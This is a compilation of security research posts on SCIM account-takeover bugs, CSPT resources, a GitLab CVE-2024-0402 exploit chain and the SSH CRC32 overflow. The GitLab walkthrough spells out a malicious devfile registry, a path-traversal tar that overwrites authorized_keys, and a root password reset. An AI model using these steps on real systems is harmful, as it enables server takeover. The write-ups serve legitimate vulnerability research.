Attackers could request a verification code to their email, change the email to a victim one with SCIM, then redeem the code and thus verify the new email address.

    PATCH /scim/v2/<ATTACKER_SAML_ORG_ID>/<ATTACKER_USER_SCIM_ID> HTTP/2
    Host: <CLIENT_PLATFORM>
    Authorization: Bearer <SCIM_TOKEN>
    Accept-Encoding: gzip, deflate, br
    Content-Type: application/json
    Content-Length: 205
    
    {
      "schemas": ["urn:ietf:params:scim:api:messages:2.0:PatchOp"],
      "Operations": [
        {
          "op": "replace",
          "value": {
            "userName": "<VICTIM_ADDRESS>"
          }
        }
      ]
    }
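The bug class disappears when a verification code is bound to the address it was issued for. The sketch below illustrates that idea with an in-memory store; the `VerificationCodes` class, its methods and the sample addresses are hypothetical, not the client's implementation.

```python
import hmac
import secrets


class VerificationCodes:
    """Keeps each pending code together with the email address it was sent to."""

    def __init__(self) -> None:
        self._pending = {}  # user_id -> (email, code)

    def issue(self, user_id: str, email: str) -> str:
        code = secrets.token_hex(4)
        self._pending[user_id] = (email.lower(), code)
        return code

    def redeem(self, user_id: str, current_email: str, code: str) -> bool:
        entry = self._pending.pop(user_id, None)  # single use, whatever the outcome
        if entry is None:
            return False
        issued_for, expected = entry
        # The code only verifies the address it was sent to.
        return issued_for == current_email.lower() and hmac.compare_digest(expected, code)


codes = VerificationCodes()
code = codes.issue("u1", "attacker@evil.example")
# The email is swapped over SCIM before redeeming: the code must no longer work.
print(codes.redeem("u1", "victim@corp.example", code))
```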

Account Takeover

In multi-tenant platforms, the SSO-SCIM identity should be linked to an underlying user object. While it is not part of the RFCs, the management of user attributes such as userName and email is required to eventually trigger the platform’s processes for validation and ownership checks.

A public example case where things did not go well while updating the underlying user is CVE-2022-1680 - Gitlab Account take over via SCIM email change. Below is a pretty similar instance discovered in one of our clients.

[*] Example - Same-Same But Different

A client permitted SCIM operations to change the email of the user and perform account takeover. The function set_username was called every time there was a creation or update of SCIM users.

        #[...]
        underlying_user = sso_user.underlying_user
        sso_user.scim["userName"] = new_name
        sso_user.username = new_name
        tenant = Tenant.find(sso_user.id)
        underlying_user&.change_email!(
          new_name,
          validate_email: tenant.isAuthzed?(new_name)
        )

        def underlying_user
            return nil if !tenant.isAuthzed?(self.username)
            # [...]
            #                                   (o)__(o)' 
            @underlying_user = User.find_by(email: self.username)
        end

The underlying_user should be nil, hence blocking the change, if the organization is not entitled to manage the user according to isAuthzed. In our specific case, the authorization function did not protect users in a specific state from being taken over. SCIM could be used to forcefully change the victim user’s email and take over the account once it was added to the tenant. If combined with the classic “Forced Tenant Join” issue, a nice chain could have been made.

Moreover, since the platform did not protect against multi-SSO context-switching, once authenticated with the new email, the attacker could have access to all other tenants the user was part of.

Extra Focus Areas

Interesting SCIM Ops Syntax

As per RFC7644, the path attribute is defined as:

The “path” attribute value is a String containing an attribute path describing the target of the operation. The “path” attribute is OPTIONAL for “add” and “replace” and is REQUIRED for “remove” operations.

As the path attribute is OPTIONAL, the nil possibility should be carefully managed when it is part of the execution logic.

def exec_scim_ops(scim_identity, operation)
        path = operation["path"]
        value = operation["value"]

        case path
        when "members"
          # [...]
        when "externalId"
          # [...]
        else
          # semi-Catch-All Logic!
        end
      end

Putting a catch-all default could allow another syntax of PatchOp messages to still hit one of the restricted cases while skipping the checks. Here is an example SCIM request body that would skip the externalId checks and edit it within the context above.

{
  "schemas": ["urn:ietf:params:scim:api:messages:2.0:PatchOp"],
  "Operations": [
    {
      "op": "replace",
      "value": {
        "externalId": "<ID_INJECTION>"
      }
    }
  ]
}

The value of an op is allowed to contain a dict of <Attribute:Value>.
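A way to close this gap is to normalize both syntaxes into the same list of (attribute, value) pairs before any check runs. The sketch below assumes simple attribute paths only (no filters or sub-attributes) and compares names case-insensitively; `expand_operation`, `touches_restricted` and the restricted set are hypothetical names.

```python
RESTRICTED = {"externalid", "members"}  # lowercase on purpose, see touches_restricted


def expand_operation(operation: dict) -> list:
    """Turn a PatchOp operation into (attribute, value) pairs, with or without a path."""
    path = operation.get("path")
    value = operation.get("value")
    if path is not None:
        return [(path, value)]
    if not isinstance(value, dict):
        raise ValueError("an operation without a path needs an object as value")
    # No path: every key of the value dict is a target attribute.
    return list(value.items())


def touches_restricted(operation: dict) -> bool:
    """True if the operation targets a restricted attribute under either syntax."""
    return any(attr.lower() in RESTRICTED for attr, _ in expand_operation(operation))


print(touches_restricted({"op": "replace", "value": {"externalId": "<ID_INJECTION>"}}))
```

With this in front of the `case` statement, the path-less request above takes the same checked branch as its `"path": "externalId"` twin.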

Bulk Ops Order Evaluation

Since bulk operations may be supported (currently very few cases), there could be specific issues arising in those implementations:

Race Conditions - the ordering logic may not account for the extra processes triggered in each step
Missing Circular References Protection - RFC7644 explicitly discusses Circular Reference Processing (see example below).

JSON Interoperability

Since SCIM adopts JSON for data representation, JSON interoperability attacks could lead to most of the issues described in the hunting list. A well-known starting point is the article: An Exploration of JSON Interoperability Vulnerabilities.

Once the parsing lib used in the SCIM implementation is discovered, check if other internal logic is relying on the stored JSON serialization while using a different parser for comparisons or unmarshaling.
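Duplicate keys are the simplest differential to probe for. As an illustration (using Python's standard `json` module, which may or may not be what the target uses), the default parser silently keeps the last value, while a stricter loader can refuse the document. The `strict_loads` and `reject_duplicates` names are mine.

```python
import json


def reject_duplicates(pairs):
    """object_pairs_hook that refuses objects containing repeated keys."""
    seen = {}
    for key, value in pairs:
        if key in seen:
            raise ValueError("duplicate key: " + key)
        seen[key] = value
    return seen


def strict_loads(text: str):
    return json.loads(text, object_pairs_hook=reject_duplicates)


body = '{"userName": "attacker", "userName": "victim"}'
print(json.loads(body))  # default behavior: the last duplicate wins
```

If another component in the chain keeps the first duplicate instead, the two sides disagree about which user the request refers to.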

Despite being a relatively simple format, JSON parser differentials could lead to interesting cases - such as the one below:

Conclusions

As an extension of SSO, SCIM has the potential to enable critical exploitations under specific circumstances. If you’re testing SSO, SCIM should be in scope too!

Finally, most of the interesting vulnerabilities in SCIM implementations require a deep understanding of the application’s authorization and authentication mechanisms. The real value lies in identifying the differences between SCIM objects and the mapped internal User objects, as these discrepancies often lead to impactful findings.

CSPT Resources

2025-03-27T00:00:00+01:00

As a follow up to Maxence Schmitt’s research on Client-Side Path Traversal (CSPT), we wanted to encourage researchers, bug hunters, and security professionals to explore CSPT further, as it remains an underrated yet impactful attack vector.

To support the community, we have compiled a list of blog posts, vulnerabilities, tools, CTF challenges, and videos related to CSPT. If anything is missing, let us know and we will update the post. Please note that the list is not ranked and does not reflect the quality or importance of the resources.

Publications (blog posts, advisories, …)

Maxence Schmitt: Exploiting Client-Side Path Traversal to Perform Cross-Site Request Forgery - Introducing CSPT2CSRF
Maxence Schmitt: CSPT & File Upload Bypasses
Dafydd Stuttard: PortSwigger - On-Site Request Forgery
Renwa: Client-Side Path Traversal (CSPT) Bug Bounty Reports and Techniques
Kapytein: From an Innocent Client-Side Path Traversal to Account Takeover
Mr. Medi: Practical Client-Side Path Traversal Attacks
Alvaro Balada: The Power of Client-Side Path Traversal: How I Found and Escalated 2 Bugs
Michelin CERT: Grafana CVE-2023-5123 Write-Up
Netragard: Saving CSRF: Client-Side Path Traversal to the Rescue
Sam Curry: CSPT2CSRF and CSPT->Open Redirect->XSS
Hussein Daher: CSPT->JSONP->XSS
Ron Masas: CSPT->XSS
Isira Adithya: CSPT->JSONP->XSS
Johan Carlsson: 1 Click CSPT->Stored id from a rogue Sentry server->PUT CSRF
Erasec: Client-Side Path Manipulation
Acut3: Fetch Diversion
Matan Berson: CSPT Levels
Facebook: Facebook Notes on CSPT
Vitor Falcão: Hacking High-Profile Bug Bounty Targets: Deep Dive into a Client-Side Chain

Videos

Maxence Schmitt: OWASP Lisbon 2024 - Exploiting Client-Side Path Traversal: CSRF Is Dead, Long Live CSRF
Maxence Schmitt: Volcamp 2024 - FR: Exploiting Client-Side Path Traversal: CSRF Is Dead, Long Live CSRF
Soheil Khodayari: OWASP Lisbon 2024 - Deep dive into CSPT techniques
Justin Gardner: Critical Thinking Podcast Channel
Grzegorz Niedziela: Bug Bounty Reports Explained Channel

Tools

Maxence Schmitt: CSPT Burp Extension
Dennis Goodlett: CSPT with Eval Villain
Kevin Mizu: DOMLoggerpp
PortSwigger: Burp Suite DOM Invader
Vitor Falcão: Automating CSPT Discovery

Challenges

Cryptocat: Intigriti Challenge 0824 - SafeNotes_2
- Write-up: SafeNotes_2 Write-up
Aleandro Prudenzano: European Cybersecurity Challenge 2024 CTF - Jeopardy - Web01
- Write-up: European Cybersecurity Challenge 2024 CTF - Jeopardy - Web01

Labs

Maxence Schmitt: CSPT Playground

Thank you and good luck!

We hope this collection of resources will help the community to better understand and explore Client-Side Path Traversal (CSPT) vulnerabilities. We encourage anyone interested to take a deep dive into exploring CSPT techniques and possibilities and helping us to push the boundaries of web security. We wish you many exciting discoveries and plenty of CSPT-related bugs along the way!

More Information

This research project was made with ♡ by Maxence Schmitt, thanks to the 25% research time Doyensec gives its engineers. If you would like to learn more about our work, check out our blog, follow us on X, Mastodon, BlueSky or feel free to contact us at info@doyensec.com for more information on how we can help your organization “Build with Security”.

!exploitable Episode Three - Devfile Adventures

2025-03-18T00:00:00+01:00

Introduction

I know, we have written it multiple times now, but in case you are just tuning in, Doyensec had found themselves on a cruise ship touring the Mediterranean for our company retreat. To kill time between parties, we had some hacking sessions analyzing real-world vulnerabilities resulting in the !exploitable blogpost series.

In Part 1 we covered our journey into IoT ARM exploitation, while Part 2 followed our attempts to exploit the bug used by Trinity in The Matrix Reloaded movie.

For this episode, we will dive into the exploitation of CVE-2024-0402 in GitLab. Like an onion, there is always another layer beneath the surface of this bug, from YAML parser differentials to path traversal in decompression functions in order to achieve arbitrary file write in GitLab.

No public Proof Of Concept was published and making it turned out to be an adventure, deserving an extension of the original author’s blogpost with the PoC-related info to close the circle 😉

Some context

This vulnerability impacts the GitLab Workspaces functionality. To make a long story short, it lets developers instantly spin up integrated development environments (IDE) with all dependencies, tools, and configurations ready to go.

The whole Workspaces functionality relies on several components, including a running Kubernetes GitLab Agent and a devfile configuration.

Kubernetes GitLab Agent: The Kubernetes GitLab Agent connects GitLab to a Kubernetes cluster, allowing users to enable deployment process automations and making it easier to integrate GitLab CI/CD pipelines. It also allows Workspaces creation.

Devfile: It is an open standard defining containerized development environments. Let’s start by saying it is configured with YAML files used to define the tools, runtime, and dependencies needed for a certain project.

Example of a devfile configuration (to be placed in the GitLab repository as .devfile.yaml):

apiVersion: 1.0.0
metadata:
  name: my-app
components:
  - name: runtime
    container:
      image: registry.access.redhat.com/ubi8/nodejs-14
      endpoints:
        - name: http
          targetPort: 3000

The bug

Let’s start with the publicly available information enriched with extra code-context.

GitLab was using the devfile Gem (Ruby of course) making calls to the external devfile binary (written in Go) in order to process the .devfile.yaml files during Workspace creation in a specific repository.

During the devfile pre-processing routine applied by Workspaces, a specific validator named validate_parent was called by PreFlattenDevfileValidator in GitLab.

# gitlab-v16.8.0-ee/ee/lib/remote_development/workspaces/create/pre_flatten_devfile_validator.rb:50
...
        def self.validate_parent(value)
          value => { devfile: Hash => devfile }
          return err(_("Inheriting from 'parent' is not yet supported")) if devfile['parent']
          Result.ok(value)
        end
...

But what is the parent option? As per the Devfile documentation:

If you designate a parent devfile, the given devfile inherits all its behavior from its parent. Still, you can use the child devfile to override certain content from the parent devfile.

Then, it proceeds to describe three types of parent references:

Parent referred by registry - remote devfile registry
Parent referred by URI - static HTTP server
Parent identified by a Kubernetes resource - available namespace

As with any other remote fetching functionality, it would be worth reviewing to find bugs. But at first glance the option seems to be blocked by validate_parent.

YAML parser differentials for the win

As is widely known, even the most used implementations of specific standards may have minor deviations from what was defined in the specification. In this specific case, a YAML parser differential between Ruby and Go was needed.

The author blessed us with a new trick for our differentials notes. In the YAML Spec:

The single exclamation mark ! is used for custom or application-specific data types
```
my_custom_data: !MyType "some value"
```
The double exclamation mark !! is used for built-in YAML types
```
bool_value: !!bool "true"
```

He found out that the local YAML tags notation ! (RFC reference) is still activating the binary format base64 decoding in the Ruby yaml lib, while the Go gopkg.in/yaml.v3 is just dropping it, leading to the following behavior:

➜ cat test3.yaml
normalk: just a value
!binary parent: got injected

### valid parent option added in the parsed version (!binary dropped)
➜ go run g.go test3.yaml
parent: got injected
normalk: just a value

### invalid parent option as Base64 decoded value (!binary evaluated)
➜ ruby -ryaml -e 'x = YAML.safe_load(File.read("test3.yaml"));puts x'
{"normalk"=>"just a value", "\xA5\xAA\xDE\x9E"=>"got injected"}

Consequently, it was possible to pass GitLab a devfile with a parent option through the validate_parent function and reach the devfile binary execution with it.

The arbitrary file write

At this point, we need to switch to a bug discovered in the devfile binary (Go implementation).
After looking into a dependency of a dependency of a dependency, the hunter got his hands on the decompress function. This was taking tar.gz archives from the registry’s library and extracting the files inside the GitLab server. Later, it should then move them into the deployed Workspace environment.

Here is the vulnerable decompression function used by getResourcesFromRegistry:

// decompress extracts the archive file
func decompress(targetDir string, tarFile string, excludeFiles []string) error {
    var returnedErr error

    reader, err := os.Open(filepath.Clean(tarFile))
    ...
    gzReader, err := gzip.NewReader(reader)
    ...
    tarReader := tar.NewReader(gzReader)
    for {
        header, err := tarReader.Next()
        ...
        target := path.Join(targetDir, filepath.Clean(header.Name))
        switch header.Typeflag {
        ...
        case tar.TypeReg:
            /* #nosec G304 -- target is produced using path.Join which cleans the dir path */
            w, err := os.OpenFile(target, os.O_CREATE|os.O_RDWR, os.FileMode(header.Mode))
            if err != nil {
                returnedErr = multierror.Append(returnedErr, err)
                return returnedErr
            }
            /* #nosec G110 -- starter projects are vetted before they are added to a registry.  Their contents can be seen before they are downloaded */
            _, err = io.Copy(w, tarReader)
            if err != nil {
                returnedErr = multierror.Append(returnedErr, err)
                return returnedErr
            }
            err = w.Close()
            if err != nil {
                returnedErr = multierror.Append(returnedErr, err)
                return returnedErr
            }
        default:
            log.Printf("Unsupported type: %v", header.Typeflag)
        }
    }
    return nil
}

The function opens tarFile and iterates through its contents with tarReader.Next(). Only contents of type tar.TypeDir and tar.TypeReg are processed, preventing symlink and other nested exploitations.

Nevertheless, the line target := path.Join(targetDir, filepath.Clean(header.Name)) is vulnerable to path traversal for the following reasons:

header.Name comes from a remote tar archive served by the devfile registry
filepath.Clean is known for not preventing path traversals on relative paths (../ is not removed)

The resulting execution will be something like:

fmt.Println(filepath.Clean("/../../../../../../../tmp/test")) // absolute path
fmt.Println(filepath.Clean("../../../../../../../tmp/test"))  // relative path

//prints

/tmp/test
../../../../../../../tmp/test

There are plenty of scripts to create a valid PoC for an evil archive exploiting such directory traversal pattern (e.g., evilarc.py).
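For readers who want to reason about the pattern without a Go toolchain, below is a rough Python model of it. It is a sketch under assumptions, not the devfile library's code: build_archive and resolve_targets are hypothetical helpers, /srv/registry/stack is a made-up destination, and posixpath.normpath stands in for the cleaning done by Go's path.Join and filepath.Clean.

```python
import io
import posixpath
import tarfile


def build_archive(member_name: str, payload: bytes) -> bytes:
    """Return a gzip-compressed tar holding one regular file with the given name."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:gz") as tar:
        info = tarfile.TarInfo(name=member_name)
        info.size = len(payload)
        tar.addfile(info, io.BytesIO(payload))
    return buf.getvalue()


def resolve_targets(archive: bytes, target_dir: str) -> list[tuple[str, bool]]:
    """Model the vulnerable join and report whether each target stays in target_dir."""
    results = []
    with tarfile.open(fileobj=io.BytesIO(archive), mode="r:gz") as tar:
        for member in tar:
            # Clean the entry name first: leading "../" segments survive this step.
            cleaned = posixpath.normpath(member.name)
            # Concatenate and clean again, which is roughly what path.Join does.
            target = posixpath.normpath(target_dir + "/" + cleaned)
            prefix = target_dir.rstrip("/") + "/"
            inside = target == target_dir or target.startswith(prefix)
            results.append((target, inside))
    return results


evil = build_archive("../../../../tmp/test", b"hello")
print(resolve_targets(evil, "/srv/registry/stack"))  # [('/tmp/test', False)]
```

The containment check at the end of resolve_targets is the kind of test the vulnerable function lacks: cleaning a path normalizes it, but only comparing the final target against the destination directory tells you whether it escaped.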

Linking the pieces

A decompression issue in the devfile lib fetching files from a remote registry allowed a devfile registry containing a malicious .tar archive to write arbitrary files within the devfile client system
In GitLab, a developer could craft a bad-yet-valid .devfile.yaml definition including the parent option that will force the GitLab server to use the malicious registry, hence triggering the arbitrary file write on the server itself

The requirements to exploit this vuln are:

Access to the targeted GitLab as a developer capable of committing code to a repository
Workspace functionality configured properly on the GitLab instance (v16.8.0 and below)

Let’s exploit it!

Configuring the environment

To ensure you have the full picture, I must tell you what it’s like to configure Workspaces in GitLab, with slow internet while being on a cruise 🌊 - an absolute nightmare!

Of course, there are the docs on how to do so, but today you will be blessed with some extra finds:

Follow the GitLab 16.8 documentation page, NOT the latest one since it changed. Do not be like us, wasting fun time in the middle of the sea.
The feature changed so much, they even removed the container images required by GitLab 16.8. So, you need to patch the missing web-ide-injector container image.
```
ubuntu@gitlabServer16.8:~$ find / -name "editor_component_injector.rb" 2>/dev/null
/opt/gitlab/embedded/service/gitlab-rails/ee/lib/remote_development/workspaces/create/editor_component_injector.rb
```
Replace the web-ide-injector image value at line 129 of that file with: registry.gitlab.com/gitlab-org/gitlab-web-ide-vscode-fork/gitlab-vscode-build:latest

The GitLab Agent must have the remote_development option to allow Workspaces.
Here is a valid config.yaml file for it

remote_development:
  enabled: true
  dns_zone: "workspaces.gitlab.yourdomain.com"
observability:
  logging:
    level: debug
    grpc_level: warn

May the force be with you while configuring it.

Time to craft

As previously stated, this bug chain is layered like an onion. Here is a classic 2025 AI generated image sketching it for us:

The publicly available information left us with the following tasks if we wanted to exploit it:

Deploy a custom devfile registry, which turned out to be easy following the original repository
Make it malicious by including the .tar file packed with our path traversal to overwrite something in the GitLab instance
Add a .devfile.yaml pointing to it in a target GitLab repository

In order to find out where the malicious.tar belonged, we had to take a step back and read some more code. In particular, we had to understand the context in which the vulnerable decompress function was being called.

We ended up reading PullStackByMediaTypesFromRegistry, a function used to pull a specified stack with allowed media types from a given registry URL to some destination directory.

See at library.go:293

func PullStackByMediaTypesFromRegistry(registry string, stack string, allowedMediaTypes []string, destDir string, options RegistryOptions) error {
	//...
	//Logic to Pull a stack from registry and save it to disk
	//...

	// Decompress archive.tar
	archivePath := filepath.Join(destDir, "archive.tar")
	if _, err := os.Stat(archivePath); err == nil {
		err := decompress(destDir, archivePath, ExcludedFiles)
		if err != nil {
			return err
		}
		err = os.RemoveAll(archivePath)
		if err != nil {
			return err
		}
	}
	return nil
}

The code pattern highlighted that devfile registry stacks were involved and that they included some archive.tar file in their structure.

Why should a devfile stack contain a tar?

An archive.tar file may be included in the package to distribute starter projects or pre-configured application templates. It helps developers quickly set up their workspace with example code, configurations, and dependencies.

A few quick GitHub searches in the devfile registry building process revealed that our target .tar file should be placed within the registry project under stacks/<STACK_NAME>/<STACK_VERSION>/archive.tar in the same directory containing the devfile.yaml for the specific version being deployed.

As a result, the destination for the path-traversal tar in our custom registry is:

malicious-registry/stacks/nodejs/2.2.1/archive.tar

Building & running the malicious devfile registry

It required some extra work to build our custom registry (couldn’t make the building scripts work, had to edit them), but we eventually managed to place our archive.tar (e.g., created using evilarc.py) in the right spot and craft a proper index.json to serve it. The final reusable structure can be found in our PoC repository, so save yourself some time to build the devfile registry image.

Commands to run the malicious registry:

docker run -d -p 5000:5000 --name local-registrypoc registry:2 to serve a local container registry that will be used by the devfile registry to store the actual stack (see yellow highlight)
docker run --network host devfile-index to run the malicious devfile registry built with the official repository. Find it in our PoC repository

Pull the trigger 💥

Once you have a running registry reachable by the target GitLab instance, you just have to authenticate in GitLab as a developer and edit the .devfile.yaml of a repository to point to it by exploiting the YAML parser differential shown before.
Here is an example you can use:

schemaVersion: 2.2.0
!binary parent:
    id: nodejs
    registryUrl: http://<YOUR_MALICIOUS_REGISTRY>:<PORT>
components:
  - name: development-environment
    attributes:
      gl/inject-editor: true
    container:
      image: "registry.gitlab.com/gitlab-org/gitlab-build-images/workspaces/ubuntu-24.04:20250109224147-golang-1.23@sha256:c3d5527641bc0c6f4fbbea4bb36fe225b8e9f1df69f682c927941327312bc676"

To trigger the file-write, just start a new Workspace in the edited repo and wait.

Nice! We have successfully written Hello CVE-2024-0402! in /tmp/plsWorkItsPartyTime.txt.

Where to go now…

We got the write, but we couldn’t stop there, so we investigated some reliable ways to escalate it.
First things first, we checked the system user performing the file write using a session on the GitLab server.

/tmp$ ls -lah /tmp/plsWorkItsPartyTime.txt
-rw-rw-r-- 1 git git 21 Mar 10 15:13 /tmp/plsWorkItsPartyTime.txt

Apparently, our go-to user is git, a pretty important user in the GitLab internals. We looked through the files it can write for a quick win but, as expected, the system seemed hardened, with few editable config files.

...
/var/opt/gitlab/gitlab-exporter/gitlab-exporter.yml
/var/opt/gitlab/.gitconfig
/var/opt/gitlab/.ssh/authorized_keys
/opt/gitlab/embedded/service/gitlab-rails/db/main_clusterwide.sql
/opt/gitlab/embedded/service/gitlab-rails/db/ci_structure.sql
/var/opt/gitlab/git-data/repositories/.gitaly-metadata
...

Some interesting files were waiting to be overwritten, but you may have noticed the quickest yet not honorable entry: /var/opt/gitlab/.ssh/authorized_keys.

Notably, you can add an SSH key to your GitLab account and then use it to SSH as git to perform code-related operations. The authorized_keys file is managed by the GitLab Shell, which adds the SSH Keys from the user profile and forces them into a restricted shell to further manage/restrict the user access-level.

Here is an example line added to the authorized keys when you add your profile SSH key in GitLab:

command="/opt/gitlab/embedded/service/gitlab-shell/bin/gitlab-shell key-1",no-port-forwarding,no-X11-forwarding,no-agent-forwarding,no-pty ssh-ed25519 AAAAC3...[REDACTED]

Since we got arbitrary file write, we can just substitute the authorized_keys with one containing a non-restricted key we can use. Back to our exploit prepping, create a new .tar ad-hoc for it:

## write a valid entry in a local authorized_keys for one of your keys
➜ python3 evilarc.py authorized_keys -f archive.tar.gz -p var/opt/gitlab/.ssh/ -o unix

At this point, substitute the archive.tar in your malicious devfile registry, rebuild its image and run it. When ready, trigger the exploit again by creating a new Workspace in the GitLab Web UI.

After a few seconds, you should be able to SSH as an unrestricted git user. Below we also show how to change the GitLab Web root user’s password:

➜ ssh  -i ~/.ssh/gitlab2 git@gitinstance.local
➜ git@gitinstance.local:~$ gitlab-rails console --environment production
--------------------------------------------------------------------------------
 Ruby:         ruby 3.1.4p223 (2023-03-30 revision 957bb7cb81) [x86_64-linux]
 GitLab:       16.8.0-ee (1e912d57d5a) EE
 GitLab Shell: 14.32.0
 PostgreSQL:   14.9
------------------------------------------------------------[ booted in 39.28s ]

Loading production environment (Rails 7.0.8)
irb(main):002:0> user = User.find_by_username 'root'
=> #<User id:1 @root>
irb(main):003:0> new_password = 'ItIsPartyTime!'
=> "ItIsPartyTime!"
irb(main):004:0> user.password = new_password
=> "ItIsPartyTime!"
irb(main):005:0> user.password_confirmation = new_password
=> "ItIsPartyTime!"
irb(main):006:0> user.password_automatically_set = false
irb(main):007:0> user.save!
=> true

Finally, you are ready to authenticate as the root user in the target Web instance.

Conclusion

Our goal was to build a PoC for CVE-2024-0402. We were able to do it despite the restricted time and connectivity. Still, there were tons of configuration errors while preparing the GitLab Workspaces environment, and we almost gave up because the feature itself was just not working after hours of setup. Once again, that demonstrates how very good bugs can be found in places where just a few people venture because of config time constraints.

Shout out to joernchen for the discovery of the chain. Not only was the bug great, but he also did amazing work describing the research path he followed in this article. We had fun exploiting it and we hope people will save time with our public exploit!

Resources

!exploitable Episode Two - Enter the Matrix

2025-02-27T00:00:00+01:00

Introduction

In case you are just tuning in, Doyensec has found themselves on a cruise ship touring the Mediterranean: unwinding, hanging out with colleagues and having some fun. Part 1 covered our journey into IoT ARM exploitation, while our next blog post, coming in the next couple of weeks, will cover a web target. For this episode, we attempt to exploit one of the most famous vulnerabilities ever: SSHNuke, from back in 2001, better known as the exploit used by Trinity in the movie The Matrix Reloaded.

Some Quick History

Back in 1998 Ariel Futoransky and Emiliano Kargieman realized SSH’s protocol was fundamentally flawed, as it was possible to inject cipher text. So a crc32 checksum was added in order to detect this attack.

On February 8, 2001 Michal Zalewski posted to the Bugtraq mailing list an advisory named “Remote vulnerability in SSH daemon crc32 compensation attack detector” labeled CAN-2001-0144 (CAN aka CVE candidate) (ref). The “crc32” had a unique memory corruption vulnerability that could result in arbitrary code execution.

A bit after June, TESO Security released a statement regarding the leak of an exploit they wrote. This is interesting as it demonstrates that until June there was no reliable public exploit. TESO was aware of 6 private exploits, including their own.

Keep in mind, the first major OS level mitigation to memory corruption was not released until July of that year in the form of ASLR. The lack of exploits is likely due to the novelty of this vulnerability.

The Matrix Reloaded started filming March of 2001 and was released May of 2003. It’s impressive they picked such an amazing bug for the movie from one of the most well-known hackers of our day.

Trying it yourself

Building exploit environments is at best boring. At sea, with no Internet, trying to build a 20 year old piece of software is a nightmare. So while some of our team worked on that, we ported the vulnerability to a standalone main.c that anyone can easily build on any modern (or even old) system.

Feel free to grab it from github, compile with gcc -g main.c and follow along.

The Bug

This is your last chance to try and find the bug yourself. The core of the bug is in the following source code.

From: src/deattack.c:82 - 109

/* Detect a crc32 compensation attack on a packet */
int
detect_attack(unsigned char *buf, u_int32_t len, unsigned char *IV)
{
	static u_int16_t *h = (u_int16_t *) NULL;
	static u_int16_t n = HASH_MINSIZE / HASH_ENTRYSIZE; // DOYEN 0x1000
	register u_int32_t i, j;
	u_int32_t l;
	register unsigned char *c;
	unsigned char *d;

	if (len > (SSH_MAXBLOCKS * SSH_BLOCKSIZE) || // DOYEN len > 0x40000
	    len % SSH_BLOCKSIZE != 0) {              // DOYEN len % 8
		fatal("detect_attack: bad length %d", len);
	}
	for (l = n; l < HASH_FACTOR(len / SSH_BLOCKSIZE); l = l << 2)
		;

	if (h == NULL) {
		debug("Installing crc compensation attack detector.");
		n = l;
		h = (u_int16_t *) xmalloc(n * HASH_ENTRYSIZE);
	} else {
		if (l > n) {
			n = l;
			h = (u_int16_t *) xrealloc(h, n * HASH_ENTRYSIZE);
		}
	}

This code makes sure the h buffer and its size n are managed properly. It is crucial, as it runs on every encrypted message. To prevent re-allocation, h and n are declared static. The xmalloc will initialize h with memory on the first call. Subsequent calls test if len is too big for n to handle; if so, an xrealloc occurs.

Have you discovered the bug? My first thought was an int overflow in xmalloc(n * HASH_ENTRYSIZE) or its twin xrealloc(h, n * HASH_ENTRYSIZE). This is wrong! These values can not be overflowed because of restrictions on n. These restrictions though, end up being the real vulnerability. I am curious if Zalewski took this path as well.

The variable n is declared early on (C99 spec) as a 16 bit value (static u_int16_t), while l is 32 bit (u_int32_t). So a potential int overflow occurs on n = l if l is greater than 0xffff. Can we get l big enough to overflow?

	for (l = n; l < HASH_FACTOR(len / SSH_BLOCKSIZE); l = l << 2)
		;

This cryptic line is our only chance to set l. It initially sets l to n. Remember n represents our static size of h. So l is acting like a temp variable to see if n needs adjustment. Every time this for loop runs, l is bit shifted left by 2 (l << 2). This effectively multiplies l by 4 every iteration. We know l is initially 0x1000, so after a single loop it will be 0x4000. Another loop and it’s 0x10000. This 0x10000 value cast to a u_int16_t will overflow and result in 0. So all possible values of n are 0x1000, 0x4000 and 0. Any further iterations of the above loop will bitshift 0 to 0.
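The shifting and truncation can be replayed outside of C. The snippet below is a small Python model, assuming HASH_FACTOR(x) expands to x*3/2 in integer arithmetic, SSH_BLOCKSIZE is 8, and the only 16-bit truncation happens on n = l; the function names are ours.

```python
SSH_BLOCKSIZE = 8


def hash_factor(x: int) -> int:
    # Assumed expansion of the HASH_FACTOR macro: x * 3 / 2 with integer division.
    return x * 3 // 2


def size_after_loop(n: int, length: int) -> tuple[int, int]:
    """Return (l, n) as they would look right after `n = l`."""
    l = n
    while l < hash_factor(length // SSH_BLOCKSIZE):
        l = (l << 2) & 0xFFFFFFFF  # l is a u_int32_t
    return l, l & 0xFFFF           # n is a u_int16_t, so the upper bits are lost


def smallest_overflowing_len(n: int = 0x1000, max_len: int = 0x40000):
    """Scan valid lengths (multiples of 8) for the first one that pushes l past 16 bits."""
    for length in range(0, max_len + 1, SSH_BLOCKSIZE):
        l, _ = size_after_loop(n, length)
        if l > 0xFFFF:
            return length
    return None


print([hex(v) for v in size_after_loop(0x1000, 0x15558)])  # ['0x4000', '0x4000']
print([hex(v) for v in size_after_loop(0x1000, 0x15560)])  # ['0x10000', '0x0']
print(hex(smallest_overflowing_len()))                     # 0x15560
```

Do not call size_after_loop with n set to 0 and a non-empty buffer: just like the C loop, it would never terminate.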

The loop runs while l < HASH_FACTOR(len / SSH_BLOCKSIZE). The HASH_FACTOR macro just multiplies its argument by 3/2. So a bit of math lets us know that len needs to be 0x15560 or more to loop twice. We can validate this with our main.c by adding the following code (or use the cheat branch of the git repo).

int main() {
	size_t len = 0x15560; 

	unsigned char *buf = malloc (len);
	memset(buf, 'A', len);

    // call to vulnerable function
	int i = detect_attack(buf, len, NULL);
	free (buf);

	printf("returned %d\n", i);
	return 0;
}

Then debug it on our Mac using lldb.

$ gcc -g main.c
$  lldb ./a.out
(lldb) target create "./a.out"
Current executable set to 'a.out' (arm64).
(lldb) source list -n detect_attack
File: main.c
...
   165  int
   166  detect_attack(unsigned char *buf, u_int32_t len, unsigned char *IV)
   167  {
   168          static u_int16_t *h = (u_int16_t *) NULL;
   169          static u_int16_t n = HASH_MINSIZE / HASH_ENTRYSIZE;
   170          register u_int32_t i, j;
   171          u_int32_t l;
(lldb)
   172          register unsigned char *c;
   173          unsigned char *d;
   174
   175          if (len > (SSH_MAXBLOCKS * SSH_BLOCKSIZE) ||
   176              len % SSH_BLOCKSIZE != 0) {
   177                  fatal("detect_attack: bad length %d", len);
   178          }
   179          for (l = n; l < HASH_FACTOR(len / SSH_BLOCKSIZE); l = l << 2)
   180                  ;
   181
   182          if (h == NULL) {
(lldb)
(lldb) b 182
Breakpoint 1: where = a.out`detect_attack + 200 at main.c:182:6, address = 0x0000000100003954
(lldb) r
Process 7691 launched: 'a.out' (arm64)
